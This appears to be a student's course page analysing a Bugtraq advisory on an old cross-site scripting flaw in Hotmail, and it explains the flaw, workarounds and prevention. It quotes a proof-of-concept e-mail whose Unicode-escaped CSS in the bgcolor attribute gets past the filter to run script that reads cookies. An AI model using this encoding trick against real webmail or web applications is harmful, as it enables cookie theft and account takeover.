Information Assurance

Richard Frankel


front | classes | research | personal | contact

Information Assurance

Bugtraq Analysis

Insufficient Javascript filtering in Hotmail

back to bugtraq analyses page


Link to Bugtraq page

Hotmail is a popular webmail client developed by Microsoft. The security issue I presented on involves a cross-site scripting vulnerability in which Javascript is not filtered, allowing arbitrary code to be executed on a victim's machine.

What the problem is
Hotmail does not filter Unicode-encoded Javascript (which is recognized by IE >= 6) that is placed in the value of the bgcolor attribute of the body tag, using CSS, of an e-mail. When the recipient views the e-mail, the bgcolor value will be part of the style attribute's value in a div tag instead. Here is the example from Bugtraq:

Attacker sends this:
<html>
<body bgcolor="#CCCCCC; background-image: url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\00
6c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063
\006f\006f\006b\0069\0065\0029'\0029">
<p>Found by http://www.sysdream.com !!!</p>
</body>
</html>


Victim receives this:
<div
style="background-color:#CCCCCC;background-image:url\0028'\006a\0061\007
6\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\
0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\00
65\0029'\0029">
<p>Found by http://www.sysdream.com !!!</p>
</div>

When the victim views the e-mail, the arbitrary Javascript will be executed on his computer. Some of the things this can do include gathering the victim's cookies, sending e-mail from the victim's account, and downloading the victim's e-mails and address book entries.


What could have prevented the problem:
Careful and exhaustive filtering/checking by Microsoft, in this case for Unicode-encoded Javascript.


Workarounds:

  • Set your browser to prompt you before Javascript execution (disabling Javascript won't work as Javascript is needed to use Hotmail)
  • Use a browser that does not support Unicode-encoded Javascript
  • Wait for Microsoft to fix this flaw (if they haven't already)


How to prevent this problem in the future:
Developers of any web application that takes user input should carefully examine/filter encoded text.